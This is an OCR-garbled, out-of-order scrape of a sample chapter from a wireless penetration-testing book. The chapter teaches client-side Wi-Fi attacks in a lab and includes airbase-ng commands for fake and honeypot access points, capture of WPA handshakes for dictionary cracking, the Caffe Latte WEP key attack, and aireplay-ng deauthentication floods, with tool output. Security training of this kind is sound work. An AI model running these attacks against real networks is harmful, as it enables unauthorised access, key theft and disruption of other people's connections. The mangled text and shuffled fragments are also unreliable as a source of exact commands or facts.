26. A2 PSK using aircrack ng The basic idea was to capture a four way WPA handshake and then launch a dictionary attack The million dollar questions is would it be possible to crack WPA Personal with just the client No access point 135 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Attacking the Client Let s revisit the WPA cracking exercise to jog our memory Supplicant Authenticat S Probe Request Response VENenMEaROr Pa gt Authentication RR Association RR Pre Shared Key 256 bit Pre Shared Key 256 bit Message b nenee2527777T TTT genererer ANounce Snounce PTK ae Message2 conoons z Snounce MIC Message 3 psz Key Installed lt pey Installatio Message 4 Sey Key Install Acknowledgement Key Installed To crack WPA we need the following four parameters from the Four Way Handshake Authenticator Nounce Supplicant Nounce Authenticator MAC Supplicant MAC Now the interesting thing is that we do not need all of the four packets in the handshake to extract this information We can get this information with either all four packets or packet 1 and 2 or just packet 2 and 3 In order to crack WPA PSK we will bring up a WPA PSK Honeypot and when the client connects to us only Message 1 and Message 2 will come through As we do not know the passphrase we cannot send Message 3 However Messag
27. D vivek IEEE 80 Beacon frame SN 131 FN 0 Flags C BI 100 SSID vivek IEEE 80 Beacon frame SN 153 FN 0 Flags C BI 100 SSID vivek IEEE 80 Probe Request SN 1798 FN 0 Flags C SSID Wireless Lab IEEE 80 Beacon frame SN 174 FN 0 Flags C BI 100 SSID vivek IEEE 80 Probe Request SN 1799 FN 0 Flags C SSID Wireless Lab IEEE 80 Probe Request SN 1800 FN 0 Flags C SSID Wireless Lab IEEE 80 Beacon frame SN 217 FN 0 Flags C BI 100 SSID vivek IEEE 80 Probe Request SN 1802 FN 0 Flags C SSID Wireless Lab IEEE 80 Beacon frame SN 238 FN 0 Flags a maar wii C BI 100 SSID vivek 11191 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Attacking the Client 3 In my case the filter would be wlan fc type_subtype 0x04 amp amp wlan sa 60 FB 42 D5 E4 01 You should now see Probe Request packets only from the client for the SSIDs Vivek and Wireless Lab Protoco Info IEEE 80 Probe Request SN 1795 FN 0 Flags C SSID Broadcast IEEE 80 Probe Request SN 1798 FN 0 Flags C SSID Wireless Lab IEEE 80 Probe Request SN 1799 FN 0 Flags C SSID Wireless Lab IEEE 80 Probe Request SN 1800 FN 0 Flags C SSID Wireless Lab IEEE 80 Probe Request SN 1802 FN 0 Flags C SSID Wireless Lab IEEE 80 Probe Request SN 1806
28. Wireless Lab c 3 mond 59 Created tap interface at0 59 Trying to set MTU on atO to 1500 59 Trying to set MTU on mon to 1800 00 Access Point with BSSID 00 C CA 3E BD 93 started 48 Client 60 FB 42 D5 E4 01 associated unencrypted to ESSID Wireless Lab 6 Now we will try the second case which is creating a fake access point Wireless Lab in the presence of the legitimate one Let us turn our access point on to ensure that Wireless Lab is available to the client For this experiment we have set the access point channel to 3 Let the client connect to the access point We can verify this from the airodump ng screen as shown next root bt Shell Konsole Edit View Bookmarks Settings Help Elapsed 40 s 2011 03 23 12 56 PWR RXQ Beacons Data s MB ENC CIPHER AUTH ESSID 00 21 91 D2 8E 25 27 100 379 31 54e OPN Wireless Lab 00 1E 40 53 02 FC 47 87 387 54 WPA TKIP PSK vivek 00 25 5E 17 C8 01 69 06 3 8 54 OPN lt length 06 gt 00 25 5E 17 C8 00 70 1 4 8 54 WEP WEP swapnil 60 25 5E 17 8 03 70 06 3 54 OPN lt length 0 gt BSSID STATION Lost Packets Probes not associated 00 21 00 3E 10 65 0 4 not associated 90 4C E5 E7 B5 34 3 not associated 00 26 5E 17 AA 93 30 40 brindavan not associated 00 24 D6 2C D3 40 2 not associated 00 23 4E 3A A3 E3 1 00 21 91 D2 8E 25 60 FB 42 D5 E4 01 36e 24e 337 329 Wireless Lab Vivek 7 Now let us bring up our fake access point with the
29. connection is successful using airodump ng as shown next root bt Shell Konsole pn Edit View Bookmarks Settings Help CH 3 J Elapsed s 2011 03 23 14 45 BSSID PWR RXQ Beacons Data s MB ENC CIPHER AUTH ESSID 00 02 CF D5 13 11 66 54 WPA TKIP PSK laxmi 00 25 5E 17 C8 03 69 54 OPN lt length 0 gt 00 25 5E 17 C8 00 70 54 WEP WEP swapnil 00 1E 40 53 02 FC 56 7 54 WPA TKIP PSK vivek 00 21 91 D2 8E 25 14 8 54e WEP WEP Wireless Lab BSSID STATION PWR Rate Lost Packets Probes not associated E4 EC 10 4F AD 74 67 6 1 93 14 Anoop 00 21 91 D2 8E 25 60 FB 42 D5 E4 01 28 0 36e 13 81 Wireless Lab Vivek 3 Let us unplug the access point and ensure the client is in the un associated stage and searching for the WEP network Wireless Lab no root bt Shell Konsole Menubn Edit View Bookmarks Settings Help CH 3 Elapsed 8 s 2011 03 23 14 46 BSSID PWR RXQ Beacons Data s CH MB ENC CIPHER AUTH ESSID 00 25 5E 17 C8 00 71 0 3 0 1 54 WEP WEP swapnil 00 1E 40 53 02 FC 50 100 72 1 1 54 WPA TKIP PSK vivek 00 02 CF D5 13 11 68 16 9 0 2 54 WPA TKIP PSK laxmi BSSID STATION PWR Rate Lost Packets Probes not associated 60 FB 42 D5 E4 01 14 0 1 32 16 Wireless Lab Vivek 4 Now we use airbase ng to bring up an access point with Wireless Lab as the SSID with the parameters shown next root bt Shell No 3 Konsole Session Edit View Bookmarks Settings Help airbase ng c 3 a 00 21
30. d5 e4 01 IEEE 80 Deauthentication SN 6 FN 0 201 9 518451 Apple_d5 e4 01 D Link_d2 8e 25 IEEE 80 Deauthentication SN 7 FN 0 204 9 523088 D Link_d2 8e 25 Apple_dS e4 01 IEEE 80 Deauthentication SN 8 FN 0 205 9 523946 Apple_d5 e4 01 IEEE 80 Deauthentication SN 6 FN 0 206 9 523949 D Link_d2 8e 25 IEEE 80 Deauthentication SN 7 FN 0 207 9 525277 D Link_d2 8e 25 IEEE 80 Deauthentication SN 9 FN 0 208 9 528588 Apple_d5 e4 01 IEEE 80 Deauthentication 210 9 530929 IEEE 80 Deauthentication 211 9 534289 D Link_d2 8e 25 Apple_dS e4 01 IEEE 80 Deauthentication 213 9 536574 Apple_d5 e4 01 D Link_d2 8e 25 IEEE 80 Deauthentication SN 13 FI 214 9 539704 Apple_d5 e4 01 IEEE 80 Deauthentication SN 8 FN 0 215 9 539706 D Link_d2 8e 25 IEEE 80 Deauthentication SN 9 FN 0 216 9 539708 D Link_d2 8e 25 Apple_d5 e4 01 IEEE 80 Deauthentication SN 10 FI 217 9 539709 Apple_d5 e4 01 D Link_d2 8e 25 IEEE 80 Deauthentication SN 11 FT 218 9 539710 D Link_d2 8e 25 Apple_d5 e4 01 IEEE 80 Deauthentication SN 12 FN 219 9 539711 Apple_d5 e4 01 D Link_d2 8e 25 IEEE 80 Deauthentication SN 13 FI 221 9 542865 D Link_d2 8e 25 Apple_d5 e4 01 IEEE 80 Deauthentication SN 14 FI 222 9 545191 Apple_d5 e4 01 D Link_d2 8e 25 IEEE 80 Deauthentication SN 15 FN 224 9 548992 D Link_d2 8e 25 Apple_d5 e4 01 IEEE 80 Deauthentication SN 16 FI 225 9 549741 D Link_d2 8e 25 Apple_d5 e4 01 IEEE 80 Deauthentication SN 14 FI 549743 Apple_d5 e4 01 D Link_d
31. e 1 and Message 2 contain all the information required to begin the key cracking process Supplicant Hacker Probe Request Response lt Authentication RR Association RR Pre Shared Key 256 bit Pre Share 6 bit Message t nnn nnnnnrnnn ene ANounce Snounce j WPA WPA2 PSK Dictionary Attack S e aa Message 2 ooo Snounce MIC 1361 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 6 Time for action AP less WPA cracking 1 We will setup a WPA PSK Honeypot with the ESSID Wireless Lab The z 2 option creates a WPA PSK access point which uses TKIP root bt Shell Konsole Menubn Edit View Bookmarks Settings Help airbase ng c 3 a 00 21 91 D2 8E 25 e Wireless Lab W 1 z 2 mon 23 51 09 Created tap interface ato 23 51 09 Trying to set MTU on atO to 1500 23 51 09 Trying to set MTU on mon to 1800 23 51 10 Access Point with BSSID 00 21 91 D2 8E 25 started 2 Let s also start airodump ng to capture packets from this network o root bt Shell No 2 Konsole Session Edit View Bookmarks Settings Help airodump ng c 3 bssid 00 21 91 D2 8E 25 write AP less WPA cracking mond jj 3 Now when our roaming client connects to this access point it starts the handshake but fails to complete it after Message 2 as discussed previously 5 root bt Shell
32. ection Let us verify that the access point is up by using airodump ng o root bt Shell Konsole Session Edit View Bookmarks Settings Help CH 3 Elapsed 32 s 2011 03 24 09 55 BSSID PWR RXQ Beacons Data s CH MB ENC CIPHER AUTH ESSID 00 21 91 D2 8E 25 19 100 291 8 0 3 54e WEP WEP Wireless Lab BSSID STATION PWR Rate Lost Packets Probes not associated 10 9A DD F4 B4 BD 51 0 1 not associated 00 16 44 19 DF 0A 65 0 1 not associated 2C 81 58 EB DD CD 73 0 1 ooo Nuo For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Attacking the Client 2 Let us connect our client to this access point as we verify it with airodump ng Edit View Bookmarks Settings Help CH 3 Elapsed 24 s 2011 03 24 10 22 BSSID PWR RXQ Beacons Data s MB ENC CIPHER AUTH ESSID Wireless Lab swapnil lt length 0 gt lt length 0 gt lt length 0 gt 00 21 91 D2 8E 25 54e WEP WEP E 17 C8 00 71 06 54 WEP WEP E 17 C8 02 72 06 54 OPN E 17 C8 01 72 06 54 OPN E 1 L 54 OPN 9 19 100 255 5 5 00 25 00 25 251 5E 17 C8 03 72 BSSID STATION PWR Rate Lost Packets Probes 00 21 91 D2 8E 25 60 FB 42 D5 E4 01 16 0 36e 473 247 Wireless Lab Vivek 3 We will now run aireplay ng to target the client and access point connection root bt Shell No 2 Konsole Edit View Bookmarks i aireplay ng deauth 1 c 60 FB 42 D5 E4 01 a 0
33. ess networks which makes them insecure out of the box We will begin with a quick recap of the 802 11 WLAN protocols using a network analyzer called Wireshark This will give us a practical understanding about how these protocols work Most importantly we will see how client and access point communication works at the packer level by analyzing Management Control and Data frames We will then learn about packet injection and packer sniffing in wireless networks and look at some tools which enable us to do the same For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 3 Bypassing WLAN Authentication talks about how to break a WLAN authentication mechanism We will go step by step and explore how to subvert Open and Shared Key authentications In course of this you will learn how to analyze wireless packets and figure out the authentication mechanism of the network We will also look at how to break into networks with Hidden SSID and MAC Filtering enabled These are two common mechanisms employed by network administrators to make wireless networks more stealthy and difficult to penetrate however these are extremely simple to bypass Chapter 4 WLAN Encryption Flaws discusses one of the most vulnerable parts of the WLAN protocol are the Encryption schemas WEP WPA and WPA2 Over the past decade hackers have found multiple flaws in these schemas and have written publically availab
34. ew Bookmarks Settings Help Aircrack ng 1 0 r1645 00 00 04 Tested 331777 keys got 11111 IVs A WOANODUBWNR OW byte vote AB 17664 1D 16640 5A 15360 BA 15360 D1 15104 07 14848 E8 14848 F0O 14848 DD 17664 78 16384 BO 16384 25 15104 48 14848 36 14592 79 14336 OF 14080 92 15872 84 15616 1A 15360 38 15104 14 14848 29 14848 A1 14592 C1 14592 7C 16896 FF 16384 7A 16128 12 15360 47 15360 B7 15360 85 15104 94 15104 0B 15872 CB 15616 OF 15104 B1 15104 A9 14848 C4 14848 2A 14592 36 14592 46 14848 47 14592 5C 14592 9A 14336 30 14080 46 14080 4C 14080 6A 14080 2B 15104 44 14592 A4 14592 EC 14592 24 14080 2B 14080 3B 14080 6D 14080 56 15872 0C 14848 21 14848 5C 14848 D8 14848 F9 14848 2C 14336 40 14336 02 14848 D4 14592 E4 14592 11 14336 13 14336 70 14336 BC 14336 46 14080 B3 16384 5E 15872 D4 15872 4C 15104 EB 14848 6F 14592 BC 14592 E0 14592 5B 15616 03 14592 24 14592 5F 14592 68 14592 E0 14592 5E 14336 95 14336 C8 15616 A6 15360 39 15104 D7 14848 95 14592 BD 14592 46 14336 0B 14080 6B 15104 15 14848 57 14848 70 14592 CE 14592 0A 14336 6F 14336 CA 14336 DOWNWARNBWERENWHN 8 Once we have enough WEP encrypted packets aircrack ng succeeds in cracking the key as shown next root bt Shell Konsole lt 3 gt Session Edit View Bookmarks Settings Help Aircrack ng 1 0 r1645 00 25 36 Tested 1285089 keys got 48988 IVs A
35. le software to break them and decrypt the data Even though WPA WPA2 is secure by design misconfiguring those opens up security vulnerabilities which can be easily exploited In this chapter we will understand the insecurities in each of these encryption schemas and do practical demos on how to break them Chapter 5 Attacks on the WLAN Infrastructure shift s our focus to WLAN infrastructure vulnerabilities We will look at the vulnerabilities created due to both configuration and design problems We will do practical demos of attacks such as access point MAC spoofing bit flipping and replay attacks rogue access points fuzzing and denial of service This chapter will give the reader a solid understanding of how to do a penetration test of the WLAN infrastructure Chapter 6 Attacking the Client opens your eyes if you have always believed that wireless client security was something you did not have to worry about Most people exclude the client from their list when they think about WLAN security This chapter will prove beyond doubt why the client is just as important as the access point when penetrating testing a WLAN network We will look at how to compromise the security using client side attacks such as mis association Caffe Latte disassociation ad hoc connections fuzzing honeypots and a host of others Chapter 7 Advanced WLAN Attacks looks at more advanced attacks as we have already covered most of the basic attacks on both the inf
36. mation www packtpub com backtrack 5 wireless penetration testing beginners guide book Attacking the Client 6 Let s connect our client to the access point and ensure it is connected 5 root bt Shell Konsole Session Edit View Bookmarks Settings Help CH 3 Elapsed 16 s 2011 03 24 10 50 BSSID PWR RXQ Beacons Data s CH MB ENC CIPHER AUTH ESSID 00 21 91 D2 8E 25 17 96 166 5 3 54e WPA2 CCMP PSK Wireless Lab BSSID STATION PWR Rate Lost Packets Probes not associated 00 26 5E 7D 76 5D 72 0 1 30 3 nkna not associated 00 16 EA 7F C9 1A 72 0 1 3 Sunny 00 21 91 D2 8E 25 60 FB 42 D5 E4 01 8 0 le 179 138 Wireless Lab Vivek 7 Letus now run aireplay ng to disconnect the client from the access point root bt Shell No 2 Konsole Session Edit View Bookmarks Settings Help aireplay ng deauth 1 c 60 FB 42 D5 E4 01 a 00 21 91 D2 8E 25 mon0 10 51 36 Waiting for beacon frame BSSID 00 21 91 D2 8E 25 on channel 3 10 51 36 Sending 64 directed DeAuth STMAC 60 FB 42 D5 E4 01 13 64 ACKs i 8 Using Wireshark we can once again verify that this works as well Menuledit View Go Capture Analyze Statistics Telephony Tools Help TUUA o a 8 98 e800 Filter wlan ad Expression Clear Apply Protoco 23 IEEE 80 Deauthentication SN 5 FN 0 Flags 200 9 516311 D Link_d2 8e 25 Apple_
37. onnected wireless client c lt client s mac gt Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 Sending DeAuth to broadcast BSSID 00 21 91 D2 8E 25 1122 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 6 10 Assuming the signal strength of our fake access point Wi
38. rastructure and the client These attacks typically involve using multiple basic attacks in conjunction to break security in more challenging scenarios Some of the attacks which we will learn include wireless device fingerprinting man in the middle over wireless evading wireless intrusion detection and prevention systems rogue access point operating using custom protocol and a couple of others This chapter presents the absolute bleeding edge in wireless attacks out in the real world For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Chapter 8 Attacking WPA Enterprise and RADIUS graduates the user to the next level by introducing him to advanced attacks on WPA Enterprise and the RADIUS server setup These attacks will come in handy when the reader has to perform a penetration test on a large Enterprise networks which rely on WPA Enterprise and RADIUS authentication to provide them with security This is probably as advanced as Wi Fi attacks can get in the real world Chapter 9 Wireless Penetrating Testing Methodology is where all the learning from the previous chapters comes together and we will look at how to do a wireless penetration test in a systematic and methodical way We will learn about the various phases of penetration testing planning discovery attack and reporting and apply it to wireless penetration testing We will also understand how to propose recommendations and
39. reless Lab is stronger than the legitimate one to the client it connects to our fake access point instead of the legitimate access point Session Edit View Bookmarks root bt Shell No 3 Konsole Settings Help 13 26 11 13 26 11 13 26 12 13 32 56 airbase ng essid Wireless Lab c 3 mon0 Created tap interface at0 Trying to set MTU on atO to 1500 Access Point with BSSID 00 C0 CA 3E BD 93 started Client 60 FB 42 D5 E4 01 associated unencrypted to ESSID Wireless Lab 11 We can verify the same by looking at the airodump ng output to see the new association of the client with our fake access point bn Edit View Bookmarks root bt Shell Konsole Settings Help CH 3 Elapsed 1 min 2011 03 23 13 33 PWR RXQ Beacons Data s CIPHER AUTH ESSID 6 100 100 49 96 65 12 70 0 71 0 71 0 STATION 00 C0 CA 3E BD 93 00 C0 CA 3E BD 93 00 C0 CA 3E BD 93 not not not not not not not associated associated associated associated associated associated associated 00 1E 40 53 02 FC 234 Wireless Lab Wireless Lab TKIP vivek TKIP laxmi lt length 06 gt WEP swapnil OPN lt length 0 gt Packets Probes 20 24 106 Wireless Lab 27 brindavan Anoop FinAirWifi FP OeeeTCCCOHF CPP RFPRPERPFEFHOO SSPTTTFO OOOOCS 11231 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book A
40. rver Security Mode WEP D WEP is the wireless encryption standard To use it you must enter the same key s into the router and the wireless stations For 64 bit keys you must enter 10 hex digits into each key box For 128 bit keys you must enter 26 hex digits into each key box A hex digit is either a number from 0 to 9 or a letter from A to F For the most secure use of WEP set the authentication type to Shared Key when WEP is enabled You may also enter any text string into a WEP key box in which case it will be converted into a hexadecimal key using the ASCII values of the characters A maximum of 5 text characters can be entered for 64 bit keys and a maximum of 13 characters for 128 bit keys If you choose the WEP security option this device will ONLY operate in Legacy Wireless mode 802 11B G This means you will NOT get 11N performance due to the fact that WEP is not supported by Draft 11N specification WEP Key Length 128 bit 26 hex digits z length applies to all keys WEP Key 1 scccccccccccccsccccccccccs WEP Key 2 sccccccccccccscescescceses WEP Key 3 cccccccccccccccccccscccccs WEP Key 4 cccccccccccccccccccccccccs Default WEP Key WEP Key 1 Authentication Shared Key 1 11251 For More Information www packtpub com backtrack 5 wireless penetration testing beginners guide book Attacking the Client 2 Let us connect our client to it and ensure that the
41. ttacking the Client What just happened We just created a Honeypot using the probed list from the client and also using the same ESSID as that of neighboring access points In the first case the client automatically connected to us as it was searching for the network In the latter case as we were closer to the client than the real access point our signal strength was higher and the client connected to us Have a go hero forcing a client to connect to the Honeypot In the preceding exercise what do we do if the client does not automatically connect to us We would have to send a De Authentication packet to break the legitimate client access point connection and then if our signal strength is higher the client will connect to our spoofed access point Try this out by connecting a client to a legitimate access point and then forcing it to connect to our Honeypot In the Honeypot attack we noticed that clients will continuously probe for SSIDs they have connected to previously If the client had connected to an access point using WEP operating systems such as Windows cache and store the WEP key The next time the client connects to the same access point the Windows wireless configuration manager automatically uses the stored key The Caffe Latte attack was invented by me the author of this book and was demonstrated in Toorcon 9 San Diego USA The Caffe Latte attack is a WEP attack which allows a hacker to retrieve the WEP key
42. without requiring an actual access point to be used or present in the vicinity This is the power of the Caffe Latte attack The attack works by bit flipping and replaying ARP packets sent by the wireless client post association with the fake access point created by us These bit flipped ARP Request packets cause more ARP response packets to be sent by the wireless client Note that all these packets are encrypted using the WEP key stored on the client Once we are able to gather a large number of these data packets aircrack ng is able to recover the WEP key easily Have a go hero practice makes you perfect Try changing the WEP key and repeat the attack This is a difficult attack and requires some practice to orchestrate successfully It would also be a good idea to use Wireshark and examine the traffic on the wireless network We have seen De Authentication attack in previous chapters as well in the context of the access point In this chapter we will explore the same in the context of the client In the next lab we will send De Authentication packets to just the client and break an established connection between the access point and the client Time for action De Authenticating the client Follow the instructions to get started 1 Let us first bring our access point Wireless Lab online again Let us keep it running on WEP to prove that even with encryption enabled it is possible to attack the access point and client conn
Download Pdf Manuals
Related Search